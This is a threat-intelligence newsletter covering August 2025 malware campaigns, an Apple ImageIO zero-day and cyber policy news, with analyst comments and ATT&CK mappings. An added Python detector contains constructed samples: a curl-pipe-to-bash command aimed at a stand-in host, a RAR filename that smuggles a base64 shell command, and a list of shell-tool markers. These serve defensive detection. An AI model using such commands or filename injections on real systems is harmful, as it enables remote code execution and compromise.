
Anomali Cyber Watch: Noodlophile Stealer, GodRAT, Apple ImageIO Zero-Day, and More

Anomali Threat Research
August 26, 2025

Noodlophile Stealer Uses Copyright Lures, Dropbox Links, and DLL Sideloading to Hit Enterprises

(published: August 18, 2025)

Attackers are distributing the Noodlophile infostealer via spear-phishing emails that impersonate law firms and threaten copyright or IP action, often sent from Gmail and tailored with targets’ Facebook Page IDs and ownership details. Victims are pushed to a “PDF” that is actually a ZIP or MSI hosted on Dropbox, which abuses signed apps for DLL sideloading. The chain uses Telegram group descriptions as a dead‑drop to a paste[.]rs payload, sets persistence, and steals browser data and system info. Earlier waves used fake AI tool lures.

Analyst Comment: The emails in this campaign include Facebook Page IDs and ownership details, showing the attackers took time to research their targets. That personalization makes the lure more convincing and harder to dismiss as generic spam. It is a good reminder that even basic public information can be weaponized to strengthen phishing attempts. This is also a moment to refresh phishing prevention training, ensuring staff know how to question messages that seem credible on the surface. Pairing that awareness with filtering of suspicious attachments and monitoring of downloads adds an extra layer of defense.

MITRE ATT&CK: T1598 - Phishing For Information | T1566.002 - Phishing: Spearphishing Link | T1574.002 - Hijack Execution Flow: DLL Side-Loading | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1555.003 - Credentials from Password Stores: Credentials From Web Browsers | T1102 - Web Service | T1071.001 - Application Layer Protocol: Web Protocols | T1070.004 - Indicator Removal on Host: File Deletion

USB Malware Campaign Spreads Cryptominer

(published: August 18, 2025)

A new campaign is distributing a Windows cryptominer through infected USB drives. The attack follows a multi-stage chain that combines DLL hijacking techniques with PowerShell execution to deliver the payload. Telemetry links the malware to Zephyr and XMRig variants, with infections reported in the US, several European nations, Egypt, India, Kenya, Indonesia, Thailand, Vietnam, Malaysia, and Australia.

Analyst Comment: USBs often get overlooked, but they still remain one of the easiest ways for malware to move around. An infected stick doesn’t need to be clever to cause problems, and in this case it was enough to drop a script and sideload a DLL to get a miner running. It’s a good reminder that basic USB hygiene matters. Scanning removable media, disabling auto-run, and keeping an eye on odd process paths are simple steps that prevent something this basic from taking hold.

MITRE ATT&CK: T1091 - Replication Through Removable Media | T1204.002 - User Execution: Malicious File | T1059.001 - Command and Scripting Interpreter: PowerShell | T1218 - Signed Binary Proxy Execution | T1105 - Ingress Tool Transfer

GodRAT Campaign Targets Financial Firms With Steganography and Dual Implants

(published: August 19, 2025)

Kaspersky reports a Gh0st RAT‑based malware dubbed GodRAT hitting trading and brokerage firms since September 2024. Initial delivery used malicious .scr screensaver files over Skype, later expanding to .pif lures that masquerade as financial documents. The loaders hide shellcode in images using steganography, fetch GodRAT from a C2 server, and in some cases abuse an expired “Valve.exe” plus “SDL2.dll” for DLL side‑loading and persistence via the Run key. Once installed, operators used a FileManager plugin and deployed Chrome and Edge password stealers. AsyncRAT was also dropped as a parallel foothold; it patches AMSI and ETW to evade scanning. Activity continues through August 12, 2025, with targeting observed in the UAE, Hong Kong, Jordan, Lebanon, and Malaysia. The toolset resembles AwesomePuppet, suggesting an evolution likely tied to the Chinese threat group Winnti.

Analyst Comment: The pairing of GodRAT and AsyncRAT shows a layered approach to persistence, with each tool covering the other’s weaknesses and providing redundancy if one is caught. It is a reminder that removing one threat does not guarantee cleanup, and defenders should always check for additional implants that may still be active.

MITRE ATT&CK: T1566.003 - Phishing: Spearphishing Via Service | T1204.002 - User Execution: Malicious File | T1059.003 - Command and Scripting Interpreter: Windows Command Shell | T1055 - Process Injection | T1620 - Reflective Code Loading | T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | T1574.002 - Hijack Execution Flow: DLL Side-Loading | T1027.003 - Obfuscated Files or Information: Steganography | T1027.002 - Obfuscated Files or Information: Software Packing | T1027.009 - Obfuscated Files or Information: Embedded Payloads | T1027.013 - Obfuscated Files or Information: Encrypted/Encoded File | T1036.005 - Masquerading: Match Legitimate Name Or Location | T1036.007 - Masquerading: Double File Extension | T1562.001 - Impair Defenses: Disable Or Modify Tools | T1082 - System Information Discovery | T1518.001 - Software Discovery: Security Software Discovery | T1083 - File And Directory Discovery | T1555.003 - Credentials from Password Stores: Credentials From Web Browsers | T1105 - Ingress Tool Transfer | T1095 - Non-Application Layer Protocol

Europe’s Ransomware Surge Is a Warning Shot for US Defenders

(published: August 20, 2025)

OpenText’s 2025 Cybersecurity Threat Report shows ransomware infection rates in Europe are three to four times higher than in the US, alongside a 28.5% rise in malware on business PCs. Researchers warn this pattern has played out before as ransomware tactics are often refined abroad before being deployed against US organizations. The current wave, tied to pro-Russian hacktivists and RaaS affiliates, is striking European infrastructure, airports, media, and government. Europe’s spike should be seen as an advance signal, not an isolated problem.

Analyst Comment: While the current wave has been tied to the Russia-Ukraine war, the conflict has become a proving ground for adversarial TTPs and malware. Infection chains, extortion methods, and ransomware tooling are being battle-tested against European infrastructure under real conditions. It is not hard to imagine those same methods, now tested and refined, being deployed against the US. What looks like a regional spike today should be used as an early warning sign for US defenders.

MITRE ATT&CK: T1595.002 - Active Scanning: Vulnerability Scanning | T1190 - Exploit Public-Facing Application | T1133 - External Remote Services | T1199 - Trusted Relationship | T1078 - Valid Accounts | T1567 - Exfiltration Over Web Service | T1486 - Data Encrypted For Impact | T1498 - Network Denial Of Service | T1657 - Financial Theft

XenoRAT Espionage Campaign Targets Embassies in South Korea

(published: August 18, 2025)

A state-sponsored operation has targeted mostly European embassies in Seoul since March, conducting at least 19 spearphishing waves to deploy the open‑source XenoRAT malware. Lures impersonated diplomats, were multilingual, and were timed to real events. Delivery relied on password‑protected ZIP files hosted on Dropbox, Google Drive, or Daum. Inside, a PDF‑themed shortcut launched PowerShell that fetched XenoRAT from GitHub and set persistence with scheduled tasks. XenoRAT supports keylogging, screenshots, webcam and microphone access, file transfer, and remote shell, and it is obfuscated and memory loaded for stealth.

Analyst Comment: While XenoRAT is most certainly a threat, I want to highlight why the campaign was effective in the first place: social engineering. The attackers relied on tactics that seem obvious in hindsight, like trusted platforms and multilingual diplomatic themes to make the lures feel natural, but also on subtler tricks such as password-protected attachments. Entering a password creates a sense of security, especially in the context of sensitive diplomatic material, reinforcing the illusion of confidentiality. Yet anyone security-minded knows that sending the password in the same email removes any real protection. It simply ensures the victim can open the file while scanners cannot. Spotting these small cues is often the difference between catching and falling for a phishing attempt.

MITRE ATT&CK: T1059.003 - Command and Scripting Interpreter: Windows Command Shell | T1204.001 - User Execution: Malicious Link | T1053.005 - Scheduled Task/Job: Scheduled Task | T1622 - Debugger Evasion | T1497 - Virtualization/Sandbox Evasion | T1055 - Process Injection | T1071.001 - Application Layer Protocol: Web Protocols

Fake Mac “Fixes” Push New Shamos macOS Infostealer

(published: August 24, 2025)

A new macOS information stealer named Shamos is being delivered through ClickFix pages that impersonate troubleshooting guides and GitHub repositories. The malware is linked by CrowdStrike to the e-crime group COOKIE SPIDER and is described as a variant of Atomic macOS Stealer. Victims are funneled via malvertising or spoofed sites such as mac-safer[.]com and rescue-mac[.]com and instructed to paste a single Terminal command that decodes a URL, downloads a Bash script, captures the user password, removes quarantine attributes, and executes a Mach-O payload that bypasses Gatekeeper. Shamos searches browsers, Keychain, Apple Notes, and crypto wallets, packages data into out.zip, and exfiltrates it with curl. With sudo rights it creates a LaunchDaemons plist for persistence and can pull additional payloads. CrowdStrike reports attempts against more than 300 environments since June 2025.

Analyst Comment: This may resonate with anyone who in their less cyber-aware days tinkered with IT, hit a roadblock, and leaned on the perceived authority of internet “gurus” for quick fixes. Copying a command from GitHub or a forum straight into Terminal without questioning it is an easy habit to fall into, and that is precisely what attackers exploit. In this case the command is a simple base64 string concealing the real instructions, something that to a typical user may look like an ordinary troubleshooting command. The best defense is to encourage users to question unfamiliar commands, reinforce that with logging and alerts for encoded one-liners, and provide trusted support paths so people do not feel forced to gamble on fixes from unverified sources.

MITRE ATT&CK: T1583.008 - Acquire Infrastructure: Malvertising | T1204.004 - User Execution: Malicious Copy and Paste | T1059.004 - Command and Scripting Interpreter: Unix Shell | T1059.002 - Command and Scripting Interpreter: AppleScript | T1548.003 - Abuse Elevation Control Mechanism: Sudo And Sudo Caching | T1543.004 - Create or Modify System Process: Launch Daemon | T1027.010 - Obfuscated Files or Information: Command Obfuscation | T1553.001 - Subvert Trust Controls: Gatekeeper Bypass | T1497 - Virtualization/Sandbox Evasion | T1555.001 - Credentials from Password Stores: Keychain | T1555.003 - Credentials from Password Stores: Credentials From Web Browsers | T1082 - System Information Discovery | T1005 - Data From Local System | T1560.001 - Archive Collected Data: Archive Via Utility | T1074.001 - Data Staged: Local Data Staging | T1105 - Ingress Tool Transfer | T1041 - Exfiltration Over C2 Channel

Scattered Spider Member Receives 10-Year Prison Term

(published: August 21, 2025)

A U.S. federal judge sentenced Noah Michael Urban, 20, linked to the Scattered Spider collective, to 10 years in prison after his April 4 guilty plea to conspiracy to commit wire fraud, wire fraud, and aggravated identity theft. He was ordered to forfeit about $4.8 million and pay $13 million in restitution. Court filings detail SIM swap attacks between August 2022 and March 2023 that targeted at least 59 victims, alongside phishing of company employees to steal credentials and data used to raid crypto accounts.

Analyst Comment: It’s good to see justice catch up with the attackers we defend against. Scattered Spider has caused real harm, yet with nearly ten members now arrested across the US and UK, it’s clear they are not untouchable. For defenders, it’s a strong reminder that the work you do helps build the evidence that makes these prosecutions possible. The process may be slow, but each sentence handed down shows that persistence pays off. Remember, every defender really does make a difference. Thank you.

Malicious RAR Filenames Trigger Fileless VShell Backdoor on Linux

(published: August 22, 2025)

Researchers describe a Linux phishing chain that embeds Base64-encoded Bash in a RAR filename. Execution happens only when an unsafe script expands the name, launching a downloader that fetches an architecture-matched ELF loader and decrypts the VShell backdoor directly in memory. Operators then mask user-space processes with kernel-like names such as kworker/0:2 to reduce scrutiny. Traditional antivirus often misses this because engines focus on file content rather than filenames. The lure observed was a beauty-survey email with a “yy.rar” attachment. VShell is open source and has been used by China-linked UNC5174.

Analyst Comment: I had not come across embedding Base64 Bash in a RAR filename, which makes this worth flagging for awareness. The real target is not the user who opens the archive but the automation that later feeds that name to a shell. That explains the quiet delivery and the jump straight to an in-memory VShell.

MITRE ATT&CK: T1566.001 - Phishing: Spearphishing Attachment | T1059.004 - Command and Scripting Interpreter: Unix Shell | T1082 - System Information Discovery | T1027.010 - Obfuscated Files or Information: Command Obfuscation | T1140 - Deobfuscate/Decode Files Or Information | T1036.005 - Masquerading: Match Legitimate Name Or Location | T1620 - Reflective Code Loading | T1105 - Ingress Tool Transfer | T1071.001 - Application Layer Protocol: Web Protocols
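Both the Shamos ClickFix one-liner and the VShell RAR filename hide a shell command inside a base64 run, so one detection serves both: decode long base64 tokens found in a logged command line or an archive entry name and flag the ones that read like shell. This is an added example, not code from the Anomali write-up; the samples below are constructed and point at a reserved `.invalid` hostname.

```python
"""Flag base64-encoded shell commands hidden in archive entry names or logged command lines."""
import base64
import binascii
import re
from typing import List, Tuple

# Runs of base64 alphabet long enough to hold a command, with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{20,}={0,2}")
# Substrings that make a decoded blob look like a downloader or shell one-liner.
SHELL_MARKERS = ("curl ", "wget ", "bash", "sh -c", "eval ", "xattr ", "chmod ", "http", "$(", "| ")
# Metacharacters that have no business in a filename an automation later hands to a shell.
META = re.compile(r"[$`;|&<>]")


def decoded_shell_runs(text: str) -> List[Tuple[str, str]]:
    """Return (token, decoded) pairs for base64 runs in text that decode to shell-like ASCII."""
    hits = []
    for m in B64_RUN.finditer(text):
        tok = m.group(0)
        try:
            raw = base64.b64decode(tok + "=" * (-len(tok) % 4), validate=True)
            decoded = raw.decode("ascii")
        except (binascii.Error, ValueError):
            continue  # not valid base64, or not text: hashes and random ids land here
        if all(c.isprintable() or c in "\n\t" for c in decoded) and any(
            k in decoded for k in SHELL_MARKERS
        ):
            hits.append((tok, decoded))
    return hits


def suspicious_entry_name(name: str) -> bool:
    """True if an archive entry name carries shell metacharacters or an encoded command."""
    return bool(META.search(name)) or bool(decoded_shell_runs(name))


# Constructed samples (not real indicators): a RAR entry name of the VShell shape
# and a pasted Terminal one-liner of the ClickFix shape, sharing one encoded command.
ENCODED = base64.b64encode(b"curl -fsSL http://example.invalid/setup.sh | bash").decode()
SAMPLE_ENTRY_NAME = f"yy_$(echo {ENCODED} | base64 -d | bash).rar"
SAMPLE_CMDLINE = f"echo {ENCODED} | base64 -d | sh"
SAFE_NAME = "quarterly_report_2025.pdf"

if __name__ == "__main__":
    for label, text in (("entry name", SAMPLE_ENTRY_NAME), ("command line", SAMPLE_CMDLINE)):
        for tok, decoded in decoded_shell_runs(text):
            print(f"[{label}] base64 run decodes to: {decoded!r}")
    print("entry name suspicious:", suspicious_entry_name(SAMPLE_ENTRY_NAME))
    print("safe name suspicious:", suspicious_entry_name(SAFE_NAME))
```

Run it over unrar/7z listing output or shell-history and process-creation logs; anything that decodes to a downloader is worth an alert even before the file itself is scanned.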

Apple Fixes ImageIO Zero-Day Possibly Exploited in Targeted Attacks

(published: August 22, 2025)

Apple has issued emergency updates for iOS, iPadOS, and macOS to patch CVE-2025-43300, an ImageIO out-of-bounds write that could allow code execution when processing a malicious image. In an August 20 advisory, Apple said it was aware of a report that the flaw may have been exploited in an “extremely sophisticated” attack against specific targeted individuals. Updates were released for iOS 18.6.2, iPadOS 18.6.2 and 17.7.10, and macOS Sequoia 15.6.1, Sonoma 14.7.8, and Ventura 13.7.8. The CVE, which carries a CVSS score of 8.8, was added to CISA’s Known Exploited Vulnerabilities catalog on August 21. Security teams are strongly advised to update affected devices without delay.

Analyst Comment: As a researcher I am coming across zero-click exploits more often, and this case shows why they are a favored choice for advanced operators. Apple’s advisory suggests exploitation was highly targeted, but once details are out, attackers may look for unpatched systems. A friendly reminder: update your Apple devices as soon as possible.

MITRE ATT&CK: T1203 - Exploitation For Client Execution

UK Drops Apple Encryption Backdoor Order After U.S. Pushback

(published: August 19, 2025)

The UK has withdrawn a Technical Capability Notice under the Investigatory Powers Act that would have required Apple to provide access to encrypted iCloud data. Apple had disabled its Advanced Data Protection feature for UK users in February after receiving the order. The move followed pressure from the U.S. government and criticism from privacy advocates. Apple is challenging the legality of the original notice before the Investigatory Powers Tribunal, which has already rejected a Home Office attempt to keep the case confidential. It remains unclear whether Apple will reinstate Advanced Data Protection in the UK.

Analyst Comment: The problem with a master key is simple. Once it exists, the entire system is weaker because attackers may eventually find a way to use it. There is understandable relief that the UK has dropped its demand, but the matter is not settled. Apple has not confirmed whether Advanced Data Protection will return for UK users, and without it, iCloud data such as backups and photos remain under Apple’s keys. That arrangement allows access when required by law but leaves users without the full control that ADP was designed to provide.
